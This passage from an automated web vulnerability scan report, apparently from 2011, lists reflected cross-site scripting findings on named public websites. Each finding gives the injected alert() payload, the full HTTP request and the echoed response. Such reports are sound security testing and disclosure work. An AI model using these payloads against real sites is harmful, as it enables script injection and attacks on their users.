The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c583c"><script>alert(1)</script>086663f75c8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /favicon.icoc583c"><script>alert(1)</script>086663f75c8 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thehollywoodgossip.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:40:10 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: fullsite=true; path=/; domain=.thehollywoodgossip.com; expires=Sat, 02-Apr-2011 14:40:10 GMT
Set-Cookie: mut=173.193.214.243.1301751610082221; path=/; expires=Sat, 30-Apr-11 13:40:10 GMT; domain=.thehollywoodgossip.com
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=kcfer0dro823m5qhqakd4rpij2; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 20009

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<link rel="canonical" href="http://www.thehollywoodgossip.com/favicon.icoc583c"><script>alert(1)</script>086663f75c8/" />
...[SNIP]...

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thirdage.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad228"><script>alert(1)</script>abbf960315 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoad228"><script>alert(1)</script>abbf960315 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thirdage.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
X-Drupal-Cache: MISS
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 13:41:56 +0000
Cache-Control: public, max-age=600
Set-Cookie: SESSfa98039aa221fd92e5bcd6d7e3f1cdbb=194f49e907f67adbbd4334f28a385153; expires=Mon, 25 Apr 2011 17:15:16 GMT; path=/; domain=.thirdage.com
Vary: Cookie,Accept-Encoding
Web-Head: web09.advomatic.com
Content-Type: text/html; charset=utf-8
Content-Length: 30060
Date: Sat, 02 Apr 2011 13:41:56 GMT
X-Varnish: 635034219
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Varnish-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" di
...[SNIP]...
<form action="/user/login?destination=/favicon.icoad228"><script>alert(1)</script>abbf960315" method="post" id="user-login">
...[SNIP]...

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thomasnet.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8619e"><script>alert(1)</script>1a24f501080 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8619e"><script>alert(1)</script>1a24f501080 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thomasnet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:59:57 GMT
Server: Apache/2.0.59 (Unix) mod_ssl/2.0.59 OpenSSL/0.9.7a PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: _tnetses=4d972bdd7eed3; path=/; domain=.thomasnet.com
Set-Cookie: _usrvst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tnuind=%7C; path=/; domain=.thomasnet.com
Set-Cookie: am1vst=1; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: am1rm=PP; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tbv2ns=Y; path=/; domain=.thomasnet.com
Set-Cookie: tbv2showPushDown=Y; path=/; domain=.thomasnet.com
Set-Cookie: am1cmp=1; path=/; domain=.thomasnet.com
Set-Cookie: referq=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUS=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: us=4d972bdd7f6a8; path=/; domain=.thomasnet.com
Set-Cookie: GID=G13017527975219; expires=Mon, 02-Apr-2012 04:00:00 GMT; path=/; domain=.thomasnet.com
Set-Cookie: tinid=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Set-Cookie: UUID=deleted; expires=Fri, 02-Apr-2010 13:59:56 GMT; path=/; domain=.thomasnet.com
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21410

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
<META name="y_key" content="6e6d842e318a7ef3">
<meta name="verify-v1"
...[SNIP]...
<a href="/print/screen/favicon.ico8619e"><script>alert(1)</script>1a24f501080" onClick="dcsExternal('/link.html','TINCATL1=TNET&TINCATL2=CLICK_PRINTSCREEN','www.thomasnet.com');" target="print" rel="nofollow">
...[SNIP]...

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tradekey.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77a87'-alert(1)-'8bb423fecbf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico77a87'-alert(1)-'8bb423fecbf HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tradekey.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:57:15 GMT
Server: Apache
Set-Cookie: PHPSESSID=bfc0f1346d753424ab94cfa33828a2d4; path=/; domain=.tradekey.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent,Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 21900

<html dir=ltr>
<head>
<title>Error 404 Page not found, Business to Business marketplace, Manufacturer directory & import export</title>
<link href="http://imgusr.tradekey.com/domains/tradekey.com/t
...[SNIP]...
Date();
   var d = t.getDate() + "-" + t.getMonth()+1 + "-" + t.getFullYear();
   
   if (seconds > 1 || d == "20-01-2011")
       tk_track_ga_event('IT', 'Page Render Time - www.tradekey.com', '/favicon.ico77a87'-alert(1)-'8bb423fecbf', seconds);
}
var old_load_fx = window.onload;
window.onload = function()
{
   track_page_render_time();
   if (old_load_fx)
       old_load_fx();
}
</script>
...[SNIP]...

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trails.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ece72'-alert(1)-'ee1533a6222 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.icoece72'-alert(1)-'ee1533a6222 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.trails.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 21954
Expires: Sat, 02 Apr 2011 13:38:51 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:38:51 GMT
Connection: close
Set-Cookie: ASP.NET_SessionId=ahv4dy55qvwmlcyvaiur4g45; domain=.trails.com; path=/; HttpOnly


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphpr
...[SNIP]...
ils.com',
                   jscdn: 'http://cdn2-www.trails.com',
                   logout: 'https://ssl.trails.com/logout.aspx',
                   login: 'https://ssl.trails.com/login.aspx?r=http%3a%2f%2fwww.trails.com%3a80%2ffavicon.icoece72'-alert(1)-'ee1533a6222',
                   signup: 'https://ssl.trails.com/subscribe.aspx',
                   account: 'https://ssl.trails.com/myaccount/',
                   profile: 'http://www.trails.com/mytrails/?p=profile'
               },
               user: {
                   name:
...[SNIP]...

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.travelpod.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7550a"><script>alert(1)</script>10b5dcdc5a1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelpod.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:11:07 GMT
Server: Apache
Content-language: "
Vary: Accept-Encoding
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 7980

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head> <title>Oh, Ohhh ...</title> <link rel="shortcut icon" href="/favicon.ico"/>
<script type="text/javascript">function L
...[SNIP]...
<a href="http://www.travelpod.ca/favicon.ico7550a"><script>alert(1)</script>10b5dcdc5a1">
...[SNIP]...

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videojug.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f6eb1'-alert(1)-'18394e848c1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /f6eb1'-alert(1)-'18394e848c1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videojug.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: private
Content-Length: 20692
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: VideoJugUser=YnFn6uAuzgEkAAAAYWEzY2U5ZjgtYzNkYi02MmYxLTFiNTAtZmYwMDA4Y2RiZjU10; expires=Mon, 01-Apr-2013 13:57:58 GMT; path=/; HttpOnly
Set-Cookie: abTest=0; expires=Sat, 30-Apr-2011 13:57:58 GMT; path=/
Set-Cookie: ASP.NET_SessionId=gyrhnaenatluzrnn3li1fr55; path=/; HttpOnly
Set-Cookie: VjPrefEd=cc=US&ed=3; expires=Tue, 02-Apr-2013 13:57:58 GMT; path=/
Set-Cookie: AuthCookie=false; expires=Mon, 04-Apr-2011 13:57:58 GMT; path=/
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:57:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<a class="m mixFlag big UK" href="/chooseedition?ReturnURL=%2ferror%2ferror404%3faspxerrorpath%3d%252froute.ashx%252ff6eb1'-alert(1)-'18394e848c1&amp;NewEdition=2" >
...[SNIP]...

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.videosurf.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88f07"><script>alert(1)</script>33281413b15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico88f07"><script>alert(1)</script>33281413b15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.videosurf.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:39:23 GMT
Server: Apache/2.2.16 (Ubuntu)
X-Powered-By: PHP/5.3.3-1ubuntu9.3
Set-Cookie: PHPSESSID=rm91d0sieefthupdu4pqg3oq33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: vsb=95; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: VSID=4d97270b593c3; expires=Sun, 01-Apr-2012 13:39:23 GMT; path=/; domain=.videosurf.com
Set-Cookie: luri=L2Zhdmljb24uaWNvODhmMDciPjxzY3JpcHQ%2BYWxlcnQoMSk8L3NjcmlwdD4zMzI4MTQxM2IxNQ%3D%3D; path=/; domain=.videosurf.com
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xm
...[SNIP]...
<meta property="og:url" content="http://www.videosurf.com/favicon.ico88f07"><script>alert(1)</script>33281413b15"/>
...[SNIP]...

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.walletpop.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bc0cc"><script>alert(1)</script>d118f04eeae was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bc0cc"><script>alert(1)</script>d118f04eeae HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.walletpop.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:20:26 GMT
Server: Apache/2.2
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: GEO-173_193_214_243=-%3A%3A-%3A%3A%3A%3A%3A%3A%3A%3A-; expires=Sun, 03-Apr-2011 14:20:26 GMT; path=/
Content-Type: text/html
Content-Length: 34369

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<link rel="canonical" href="http://www.walletpop.com/bc0cc"><script>alert(1)</script>d118f04eeae/"/>
...[SNIP]...

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.washington.edu
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload caf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 was submitted in the REST URL parameter 1. This input was echoed as caf60<img src=a onerror=alert(1)>2b58733a9f9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icocaf60<img%20src%3da%20onerror%3dalert(1)>2b58733a9f9 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.washington.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 14:19:39 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8h DAV/2 PHP/5.2.6 mod_pubcookie/3.3.3 mod_uwa/3.2.1
X-Powered-By: PHP/5.2.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1174
Content-Type: text/html

<html>
<head><title>URL Not Found</title></head>
<body>
<h1>URL Not Found</h1>
<b>http://www.washington.edu/favicon.icocaf60&lt;img src=a onerror=alert(1)&gt;2b58733a9f9</b> was not found or is no lon
...[SNIP]...
<br>
Reason: File does not exist: /www/world/favicon.icocaf60<img src=a onerror=alert(1)>2b58733a9f9.</br>
...[SNIP]...

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 919c3"><script>alert(1)</script>12d36552cd5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico919c3"><script>alert(1)</script>12d36552cd5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:32 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8308

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<body class="favicon_ico919c3"><script>alert(1)</script>12d36552cd5">
...[SNIP]...

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wowhead.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a6c7'-alert(1)-'d930151ee15 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico6a6c7'-alert(1)-'d930151ee15 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.wowhead.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:33:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-cache, must-revalidate, max-age=604800
Expires: Sat, 09 Apr 2011 13:33:33 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8122

<!DOCTYPE html>
<html>
<head>

<title>Page Not Found - Wowhead</title>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<meta name="description" content="It appears that the
...[SNIP]...
<![CDATA[
var g_pageInfo = { articleUrl: 'favicon.ico6a6c7'-alert(1)-'d930151ee15', editAccess: 574 };
//]]>
...[SNIP]...

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yakaz.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 was submitted in the REST URL parameter 1. This input was echoed as d0b98<img src=a onerror=alert(1)>861ec7fe5e5 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /favicon.icod0b98<img%20src%3da%20onerror%3dalert(1)>861ec7fe5e5 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yakaz.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Yakaz Web Server
Date: Sat, 02 Apr 2011 13:59:51 GMT
Content-Length: 93174
Content-Type: text/html; charset=utf-8
Set-Cookie: il=en; expires=Sun, 01-Apr-2012 13:59:51 GMT; path=/; domain=.yakaz.com
Set-Cookie: YSID=63238dac50279b2939e0c29adb0e3dea; path=/; domain=.yakaz.com
Set-Cookie: infos=deleted; expires=Fri, 02-Apr-2010 13:59:50 GMT; path=/; domain=.yakaz.com

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:v="urn:schemas-microsoft-co
...[SNIP]...
<h1>Favicon.icod0b98<img Src=a Onerror=alert(1)>861ec7fe5e5</h1>
...[SNIP]...

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54dd2</script><a>f1938ad83fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /54dd2</script><a>f1938ad83fa HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:27 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
ETag: "efc9b484b7207b82659734d8cfebfe0f"
Cache-Control: no-cache
Set-Cookie: search_terms=script%3E%3Ca%3Ef1938ad83fa; path=/
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+jh14baofnio57yzbozczk0ikdipjq%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A26.842806+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A26.842811+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:26 GMT
Set-Cookie: vrid=de53bf40-3f54-012e-53bd-00163ebee541; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:26 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlNGUzNjI4OGEyMDYyYzdkMDlhODhhYjk2Njk3ODhhYjM6E2RleF9zZXNzaW9uX2lkSSIpZGU1NTdmZTAtM2Y1NC0wMTJlLTUzYmUtMDAxNjNlYmVlNTQxBjoGRUY%3D--a614b3974beb8c37155b66aa649d5cc0df7037fd; path=/; HttpOnly
Set-Cookie: b=10011; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-ddea1480-3f54-012e-fd15-00163ebee541
Expires: Sat, 02 Apr 2011 12:44:26 GMT
Content-Length: 324385

<!DOCTYPE html>
<html>
<head>

<title>No Location Found - YP.com</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="" name="description" />
<meta content="" n
...[SNIP]...
aq.push(['_setAllowAnchor',true]);
_gaq.push(['_setDomainName', ".yellowpages.com"]);
_gaq.push(['_setCustomVar', 1, 'trial_id', "relevancyControl1", 1]);

_gaq.push(['_trackPageview','/54dd2</script><a>f1938ad83fa?gasearch=script%3E%3Ca%3Ef1938ad83fa']);

(function() {
var s, ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = "http://www.goo
...[SNIP]...

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yellowpages.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 was submitted in the REST URL parameter 1. This input was echoed as c496d<img src=a onerror=alert(1)>63985e825a0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /c496d<img%20src%3da%20onerror%3dalert(1)>63985e825a0 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.yellowpages.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:44:41 GMT
Status: 200 OK
Connection: keep-alive
Server: nginx
Content-Type: text/html; charset=utf-8
X-Runtime: 706
ETag: "3e44fe57bd9f1ca7ae2413ad405470b5"
Cache-Control: no-cache
Set-Cookie: parity_analytics=---+%0A%3Avisit_id%3A+he7kp7sk7c48bgofxgtgaayor1ghp%0A%3Avisit_start_time%3A+2011-04-02+12%3A44%3A41.415141+%2B00%3A00%0A%3Alast_page_load%3A+2011-04-02+12%3A44%3A41.415143+%2B00%3A00%0A; path=/; expires=Wed, 02-Apr-2036 12:44:41 GMT
Set-Cookie: vrid=e7021120-3f54-012e-d795-00237da0b95e; domain=.yellowpages.com; path=/; expires=Sat, 02-Apr-2016 12:44:41 GMT
Set-Cookie: _parity_session=BAh7BzoPc2Vzc2lvbl9pZCIlMDU2NjM2ZjQwZTU5NzkxM2ZmODBhZDg1OTkwOWNhYTM6E2RleF9zZXNzaW9uX2lkSSIpZTcwMzkwNjAtM2Y1NC0wMTJlLWQ3OTYtMDAyMzdkYTBiOTVlBjoGRUY%3D--9e7ac88334df5357779cb76d6b268bfc634f7ddf; path=/; HttpOnly
Set-Cookie: b=10010; domain=.yellowpages.com; path=/; expires=Thu, 20 Dec 2012 00:00:01 GMT
X-Urid: d-e6a5db50-3f54-012e-19bb-00237da0b95e
Expires: Sat, 02 Apr 2011 12:44:40 GMT
Content-Length: 322976

<!DOCTYPE html>
<html>
<head>

<title>C496d<Img Src=A Onerror=Alert(1)>63985e825a0 - YP.COM</title>
<meta content="text/html; charset=utf-8" http-equiv="Content-Type" />
<meta content="C496d&lt;Img Sr
...[SNIP]...
<h3 class="title">C496d<Img Src=A Onerror=Alert(1)>63985e825a0 Near You</h3>
...[SNIP]...

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.yourdictionary.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbb5b"><script>alert(1)</script>8beaa66c83f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

